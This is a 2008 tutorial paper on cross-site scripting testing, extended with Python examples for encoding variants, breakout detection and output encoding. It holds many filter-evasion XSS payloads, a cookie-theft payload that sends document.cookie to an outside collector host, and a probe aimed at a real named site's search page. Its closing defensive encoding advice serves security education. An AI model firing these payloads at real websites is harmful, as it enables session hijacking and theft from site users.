Examples Of Cross Site Scripting Tests

Posted Dec 31, 2008
Authored by Rohit Bansal

This paper provides a wide range of methods for testing possible cross site scripting vulnerabilities on web applications.

tags | paper, web, vulnerability, xss
SHA-256 | 1ded78efce95f29cc0b7bf13ce3311ab2cc4a86490c2c1243407817565e38825

---------------------------------------------------------------------------------------
[+] Understanding XSS with Samples <http://www.darkc0de.com/tutorials/Understanding_XSS_with_Samples.txt>
[+] Author: Rohit Bansal

---------------------------------------------------------------------------------------
Cross Site Scripting exists because web applications fail to filter or encode
user input (form fields, query parameters, request paths) before writing it back
into a page. Whatever the attacker sends is then parsed by the victim's browser
as markup and script.


[example 1] <a href="http://[XSS-host]/xssfile?hackerz request">Free !</a>
[example 2] <iframe src="http://[XSS-host]/xssfile?evil request">Free !</iframe>
[example 3] <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://www.Site.com/xss.js"></SCRIPT>

Example 3 never contains the literal string "<SCRIPT src" in the raw input, so a
filter looking for it sees nothing; the browser assembles the second tag when
document.write runs.




XSS Cookie Theft (JavaScript)

http://host/a.php?variable="><script>document.location='http://www.mysite.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

The injected script redirects the victim's browser to the attacker's collector
(cookie.cgi on www.mysite.com in this example) with the victim's cookies appended
to the query string. Only cookies without the HttpOnly flag are readable through
document.cookie.




Modifying Cookies

Script running in the page can also set cookies in the victim's browser for the
vulnerable site:

[example 1]
<script>javascript:void(document.cookie="username=Admin")</script>





How to Search for Vulnerable Hosts

Here the payload is placed in the URL path. It executes only when the server's
error page (typically the 404 page) echoes the requested path into the HTML
without encoding it. The variants below differ in quoting, trailing characters
and escaping so that at least one survives whatever rewriting the server applies:

[example 1] [host]/<script>alert("XSS")</script>
[example 2] [host]/<script>alert('XSS')</script>/
[example 3] [host]/<script>alert('XSS')</script>.
[example 4] [host]/<script>alert('XSS')</script>
[example 5] [host]/\<script\>alert(\'XSS\')\<\/script\>
[example 6] [host]/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
[example 7] [host]/\<sCRIPT>alert("d")</sCRIPT>\
[example 8] [host]/<\73CRIP\T>alert("dsf")<\/\73CRIP\T>
[example 9] [host]/<\73CRIP\T>alert('dsf')<\/\73CRIP\T>
[example 10] [host]/</sCRIP/T>alert("dsf")<///sCRIP/T>
[example 11] [host]/</sCRIP/T>alert('dsf')<///sCRIP/T>




Further basic probes (the "javascript:" prefix inside a script block is parsed as
a harmless label):

[example 1] <script>javascript:alert(document.cookie)</script>
[example 2] <script>javascript:alert("XSS")</script>
[example 3] "<script>alert()</script>"This Site is not Secure!





- Also try the payload as a query string, i.e. after a "?" following the host
(this is still a GET request; the part after "?" is the query string, not a POST
body):

[example 1] [host]/?<script>alert('XSS')</script>




Web Server XSS

Many web servers answer a request for a non-existent file in a folder with a
default error page that repeats the requested file name. If the name is written
into that page without encoding, script inside the name executes. The msgbox
payload below is VBScript and only runs in Internet Explorer; use a
<script>alert('XSS')</script> variant for other browsers. The extension is varied
because each extension may be served by a different handler with its own error page.

[example 1]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".bas
[example 2]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".asp
[example 3]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".jsp
[example 4]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".htm
[example 5]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".html
[example 6]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".[ext]




A common place for an XSS hole is inside a server's default example files (the
sample CGI scripts shipped with the server), such as:

[example 1] [host]/cgi/example?test=<script>alert('xss')</script>




The most common places to find XSS are the search pages of web applications,
which echo the search string back into the results page:

[example 1] [host]/search.php?searchstring=<script>alert('XSS')</script>
[example 2] [host]/search.php?searchstring="><script>alert('XSS')</script>
[example 3] [host]/search.php?searchstring='><script>alert('XSS')</script>




Social Engineering XSS

Percent-encoding the payload instead of sending the literal characters may fool
filters that look for "<script>" in the raw request, and an encoded link is less
obviously malicious to the victim who is asked to click it. The variants below
encode individual letters of the tag name (%53 is "S"), encode "/" as %2f, and
encode the quotes (%27 is ' and %22 is "):

[example 1] [host]/%3cscript%3ealert('XSS')%3c/script%3e
[example 2] [host]/%3c%53cript%3ealert('XSS')%3c/%53cript%3e
[example 3] [host]/%3c%53cript%3ealert('XSS')%3c%2f%53cript%3e
[example 4] [host]/%3cscript%3ealert('XSS')%3c/script%3e
[example 5] [host]/%3cscript%3ealert('XSS')%3c%2fscript%3e
[example 6] [host]/%3cscript%3ealert(%27XSS%27)%3c%2fscript%3e
[example 7] [host]/%3cscript%3ealert(%27XSS%27)%3c/script%3e
[example 8] [host]/%3cscript%3ealert("XSS")%3c/script%3e
[example 9] [host]/%3c%53cript%3ealert("XSS")%3c/%53cript%3e
[example 10] [host]/%3c%53cript%3ealert("XSS")%3c%2f%53cript%3e
[example 11] [host]/%3cscript%3ealert("XSS")%3c/script%3e
[example 12] [host]/%3cscript%3ealert("XSS")%3c%2fscript%3e
[example 13] [host]/%3cscript%3ealert(%22XSS%22)%3c%2fscript%3e
[example 14] [host]/%3cscript%3ealert(%22XSS%22)%3c/script%3e

(%22 decodes to the double quote; %34 would decode to the digit 4 and give a
JavaScript syntax error.)





- Also try the encoded payload as a query string after "?" following the host:

[example 1] [host]/?%3cscript%3ealert('XSS')%3c/script%3e




100% encoded

Every byte is percent-encoded, including the letters. These decode to
"><script>document.cookie</script>, '><script>document.cookie</script> and
><script>document.cookie</script> respectively.

[example 1] [host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 2] [host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 3] [host]/%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e




Another form of encoding is HTML entities: <script>alert(document.cookie)</script>
becomes &lt;script&gt;alert(document.cookie)&lt;/script&gt;

< is encoded as: &lt;
> is encoded as: &gt;

A browser displays entity-encoded text as literal characters, so these variants
only execute if the application decodes the entities itself before writing the
value into the page (or decodes the input twice). The percent-encoded form in
example 1 is decoded by the web server and is the usual case.

[example 1] %3Cscript%3Ealert(%22XSS%22)%3C/script%3E
[example 2] &lt;script&gt;alert("XSS")&lt;/script&gt;
[example 3] &#60;script&#62;alert("XSS")&#60;/script&#62;
[example 4] &lt;script&gt;alert(%22XSS%22)&lt;/script&gt;
[example 5] &lt;script&gt;alert('XSS')&lt;/script&gt;




[example 1]
www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E
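As an added example (Python, not part of the original paper), the following generates the encoding variants from the sections above from a single payload and decodes them the way the web server and the browser would. The base payload, the variant names and the helper names (percent_all, percent_specials, toggle_tag_case) are my own choices, not the paper's.

```python
import re
from html import escape, unescape
from urllib.parse import quote, unquote

# Constructed base payload, the same one the paper uses throughout.
BASE = "<script>alert('XSS')</script>"


def percent_all(s: str) -> str:
    """Percent-encode every byte: the paper's "100% encoded" form."""
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def percent_specials(s: str) -> str:
    """Encode only the characters a naive filter keys on (< > / ' " ( ) and
    spaces) and leave letters readable. quote() with safe="" does exactly that."""
    return quote(s, safe="")


def toggle_tag_case(s: str) -> str:
    """Mix the case of the tag name only. HTML tag names are case-insensitive,
    but 'alert' is JavaScript and must keep its case."""
    return re.sub(r"(</?)script", lambda m: m.group(1) + "sCrIpT", s, flags=re.I)


def entity_encode(s: str) -> str:
    """HTML-entity form (&lt;script&gt;...). A browser renders this as text, so it
    only fires if the application entity-decodes input before writing it out."""
    return escape(s, quote=True)


def variants(payload: str = BASE) -> dict:
    """Every encoding of one payload, keyed by encoding name."""
    return {
        "plain": payload,
        "mixed_case": toggle_tag_case(payload),
        "percent_specials": percent_specials(payload),
        "percent_specials_mixed_case": percent_specials(toggle_tag_case(payload)),
        "percent_all": percent_all(payload),
        "entity": entity_encode(payload),
    }


def as_server_sees(s: str) -> str:
    """What a server-side script receives after one round of URL decoding."""
    return unquote(s)


def as_browser_shows(s: str) -> str:
    """What the browser displays once entities are turned back into characters
    (this is rendering as text, not execution)."""
    return unescape(s)


if __name__ == "__main__":
    for name, value in variants().items():
        print(f"{name:28} {value}")
    # The paper writes alert(%34XSS%34): %34 is the digit 4, %22 is the double quote.
    print(as_server_sees("alert(%34XSS%34)"), "|", as_server_sees("alert(%22XSS%22)"))
```

quote() emits upper-case hex digits (%3C) while the paper mostly uses lower-case (%3c); servers decode both, and a filter that only matches one case is exactly the kind of filter these variants are meant to slip past. Decoding the paper's "100% encoded" example 1 with as_server_sees gives back "><script>document.cookie</script>.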




Any of the XSS requests presented above can be used against any dynamic page
(asp, cfm, jsp, cgi, php or any other server-side template), not only search pages:

[example 1] [host]/forum/post.asp?<script>alert('XSS')</script>
[example 2] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e
[example 3] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e
[example 4] [host]/forum/post.asp?%3cscript%3ealert(%22XSS%22)%3c/script%3e
[example 5] [host]/forum/post.asp?<script>alert("XSS")</script>




Provoking errors also helps: send a string where a number is expected, "\" or "/"
instead of a string, a very long string or a very large number. Error pages
frequently echo the offending parameter back without encoding it, so all of these
malformed parameters can reveal a place to inject XSS script.

Tag Closer

The "Tag Closer" method consists of entering non-alphabetic and non-numeric
characters into a form's text input boxes. These characters could be:
\,/,~,!,#,$,%,^,&,-,[,],null (char 0),.(dot)
but the characters that most often do the job are " or '. A reflected value
usually lands inside an attribute such as value="...", so we simply enter "> or '>
instead of our name/email/username/password etc.: the quote ends the attribute
value, the > ends the tag, and everything after it is parsed as new markup.

[example 1]
[host]/admin/login.asp?username="><script>alert('XSS')</script>&password=1234

[example 2]
[host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script>

[example 3]
[host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')</script>
[example 4]
[host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>




[example 1]
[host]/admin/login.asp?username='><script>alert('XSS')</script>&password=1234

[example 2]
[host]/admin/login.asp?username=admin&password='><script>alert('XSS')</script>

[example 3]
[host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~'></textarea>--><script>alert('XSS')</script>
[example 4]
[host]/search.php?action=soundex&firstname='><script>alert(document.cookie)</script>




The same closers can also be tried against the server root, where the request
string is often reflected into a default page:

[example 1] [host]/?"><script>alert('XSS')</script>
[example 2] [host]/?'><script>alert('XSS')</script>
[example 3] [host]/?--><script>alert('XSS')</script>
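The tag-closer method above is really two questions: where did the reflected value land, and which of the closing characters survived. As an added example (Python, not from the paper), the following answers both from a response body. It injects a constructed canary (a marker, the characters " ' < >, and an end marker) instead of a real payload, then reports which characters came back unencoded and whether the value sits in an attribute, in text, or inside a script block, and from that derives the closer to prepend. The four response bodies are constructed stand-ins for different servers, not captures.

```python
import re

# Constructed canary (not from the paper): a start marker, the characters the
# tag-closer method depends on, and an end marker. Injecting this before any
# real payload shows which characters come back untouched and where they land.
START, END = "xq7z", "z7qx"
PROBE = "\"'<>"
CANARY = START + PROBE + END

# Constructed responses standing in for four different servers.
RAW_RESPONSE = (          # reflects the value verbatim inside value="..."
    '<html><body><form><input type="text" name="q" value="' + CANARY + '">'
    "</form></body></html>"
)
ESCAPED_RESPONSE = (      # entity-encodes everything
    '<html><body><form><input type="text" name="q" value="'
    + START + "&quot;&#x27;&lt;&gt;" + END + '"></form></body></html>'
)
PARTIAL_RESPONSE = (      # encodes only < and >; the quotes survive
    '<html><body><form><input type="text" name="q" value="'
    + START + "\"'&lt;&gt;" + END + '"></form></body></html>'
)
TEXT_RESPONSE = "<html><body><p>No results for " + CANARY + "</p></body></html>"


def surviving_chars(body: str, probe: str = PROBE) -> str:
    """Probe characters present, unencoded, between the two markers. Because the
    check is per character, it also works when the server strips some of them."""
    i = body.find(START)
    j = body.find(END, i + len(START)) if i >= 0 else -1
    if i < 0 or j < 0:
        return ""
    segment = body[i + len(START):j]
    return "".join(c for c in probe if c in segment)


def injection_context(body: str) -> str:
    """Where the marker landed: 'script' (inside a <script> block), 'tag'
    (inside an open tag, i.e. an attribute value), 'text' or 'none'."""
    i = body.find(START)
    if i < 0:
        return "none"
    before = body[:i]
    low = before.lower()
    last_open = low.rfind("<script")
    if last_open >= 0 and low.rfind("</script") < last_open:
        return "script"
    if before.rfind("<") > before.rfind(">"):
        return "tag"
    return "text"


def breakout_prefix(body: str):
    """The 'tag closer' to put in front of <script>: the quote that opened the
    attribute plus '>'. '' when no closer is needed (plain text context), None
    when the surviving characters are not enough to break out."""
    ctx = injection_context(body)
    alive = surviving_chars(body)
    if ctx == "text":
        return "" if "<" in alive and ">" in alive else None
    if ctx != "tag":
        return None          # script context needs a JS payload, not a tag closer
    before = body[:body.find(START)]
    m = re.search(r"=\s*([\"'])[^\"']*$", before)   # which quote opened the value?
    quote_char = m.group(1) if m else ""
    if quote_char in alive and ">" in alive and "<" in alive:
        return quote_char + ">"
    return None


def build_payload(body: str, script: str = "<script>alert('XSS')</script>"):
    """Full payload for this response, or None if the filter held."""
    prefix = breakout_prefix(body)
    return None if prefix is None else prefix + script


if __name__ == "__main__":
    for name, body in [("raw", RAW_RESPONSE), ("escaped", ESCAPED_RESPONSE),
                       ("partial", PARTIAL_RESPONSE), ("text", TEXT_RESPONSE)]:
        print(f"{name:8} context={injection_context(body):6} "
              f"alive={surviving_chars(body)!r:8} payload={build_payload(body)!r}")
```

The partial server shows why the method needs both characters: the quotes survive, so "> would end the attribute, but without an unencoded > and < no new tag can be opened, and the function correctly reports no breakout. A reflection inside a <script> block is flagged separately because entity- and tag-based closers do not apply there.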




About <plaintext>

Another trick for exploiting an XSS was found by putting a <plaintext> tag after
the XSS code. <plaintext> makes the browser treat the whole remainder of the page
as literal text, so nothing after it is rendered or executed; the injected script
has already run by then. That can help when the application's own markup after
the injection point otherwise breaks the page. Sometimes that makes it easier to
exploit:

[example 1] [host]/?"><script>alert('XSS')</script><plaintext>
[example 2] [host]/?'><script>alert('XSS')</script><plaintext>
[example 3]
[host]/admin/login.asp?username="><script>alert('XSS')</script><plaintext>&password=1234

[example 4]
[host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script><plaintext>

[example 5] [host]/forum/post.asp?<script>alert('XSS')</script><plaintext>
[example 6]
[host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e<plaintext>
[example 7]
[host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e<plaintext>
[example 8]
[host]/forum/post.asp?%3cscript%3ealert(%22XSS%22)%3c/script%3e<plaintext>
[example 9] [host]/forum/post.asp?<script>alert("XSS")</script><plaintext>
[example 10]
[host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script><plaintext>




[example 1]
www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cplaintext%3E

Simple codes, in case some of the above do not seem to work (the first one closes
a <title> element first, because markup inside <title> is treated as text):

</title><script>alert("XSS");</script><title><plaintext>
<script>alert(document.cookie)</script><plaintext>




Security Conclusion

[Replace] (encode on output, every time user-supplied data is written into a page)

< with &lt;
> with &gt;
& with &amp;
" with &quot;
' with &#x27;

This table is correct for data written into HTML text and into quoted attribute
values. Data written into a URL, a JavaScript string or a CSS value needs the
encoding of that context as well; entity encoding alone does not make those safe.
Replacement is preferable to stripping: a filter that deletes "<script>" in one
pass turns <scr<script>ipt> into <script>.

[Possible XSS] (tags a filter must treat as dangerous; a list like this is a
blacklist, is bypassed by the case and encoding tricks shown above, and so
supplements output encoding rather than replacing it)

<applet> <frameset> <layer> <body>
<html> <ilayer> <embed> <iframe>
<meta> <frame> <img> <object>
<script> <style>
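To make the conclusion concrete, here is an added example (Python, not from the paper) that renders the same search page twice: once echoing the parameter unencoded, as the vulnerable search.php examples do, and once with the replacement table applied per context (entities for HTML text and attributes, percent-encoding plus entities for a URL inside an href). It also shows why stripping the [Possible XSS] tags instead of encoding fails. The page fragment, the payload and the function names are my own constructions.

```python
import re
from html import escape
from urllib.parse import quote

# Constructed payload, the paper's tag-closer form.
PAYLOAD = "\"><script>alert('XSS')</script>"

# The paper's [Possible XSS] list, used below as a stripping blacklist.
BLACKLIST = ("applet", "frameset", "layer", "body", "html", "ilayer", "embed",
             "iframe", "meta", "frame", "img", "object", "script", "style")


def render_vulnerable(q: str) -> str:
    """Echoes q unencoded into three contexts, as the vulnerable search pages do."""
    return (
        f'<input type="text" name="q" value="{q}">\n'
        f"<p>Results for {q}</p>\n"
        f'<a href="/search.php?searchstring={q}">search again</a>'
    )


def html_text(s: str) -> str:
    """The paper's replacement table: < > & " (and ') become entities. Correct
    for HTML text and quoted attribute values."""
    return escape(s, quote=True)   # &lt; &gt; &amp; &quot; &#x27;


def url_param(s: str) -> str:
    """URL context: percent-encode for the query string, then entity-encode
    because the URL sits in an href attribute. Innermost context first."""
    return html_text(quote(s, safe=""))


def render_hardened(q: str) -> str:
    """Same page with output encoding chosen per context."""
    return (
        f'<input type="text" name="q" value="{html_text(q)}">\n'
        f"<p>Results for {html_text(q)}</p>\n"
        f'<a href="/search.php?searchstring={url_param(q)}">search again</a>'
    )


def blacklist_strip(s: str) -> str:
    """What NOT to do: delete blacklisted tags in a single pass. Removal lets
    <scr<script>ipt> collapse into <script>, and event handlers on tags that
    are not listed are never looked at."""
    pattern = r"</?(?:" + "|".join(BLACKLIST) + r")\b[^>]*>"
    return re.sub(pattern, "", s, flags=re.I)


def has_script_tag(html: str) -> bool:
    """Crude marker check, used only to compare the renderings above."""
    return re.search(r"<\s*/?\s*script", html, re.I) is not None


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD), "\n---")
    print(render_hardened(PAYLOAD), "\n---")
    nested = "<scr<script>ipt>alert(1)</scr</script>ipt>"
    print(blacklist_strip(nested))
```

In the hardened output the tag closer comes back as &quot;&gt;&lt;script&gt;, which the browser displays as text inside the attribute and the paragraph, while the href gets %22%3E%3Cscript%3E so that the same string cannot end the URL or the attribute. Data placed inside a <script> block still needs JavaScript-string encoding on top of this, which this example does not cover.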

---------------------------------------------------------------------------------------
[+] Rohit Bansal [rohitisback@gmail.com]
[+] Schap, Infysec
---------------------------------------------------------------------------------------